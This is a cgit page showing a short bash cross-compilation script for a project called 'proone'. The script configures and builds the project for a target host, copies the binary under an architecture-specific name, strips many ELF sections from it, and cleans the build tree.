aboutsummaryrefslogtreecommitdiff
path: root/scripts/xcomp.sh
blob: 2ff24a5a96edf821f44d9fb0900019f0bb67e627 (plain)
1
2
3
4
5
6
7
8
#!/bin/bash
OUT="$PROONE_BIN_PREFIX.$PROONE_BIN_ARCH"

./configure --host="$PROONE_HOST" &&\
    make -j$(nproc) &&\
    cp -a src/proone "$OUT" &&\
    "$PROONE_HOST-strip" -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr "$OUT" &&\
    make distclean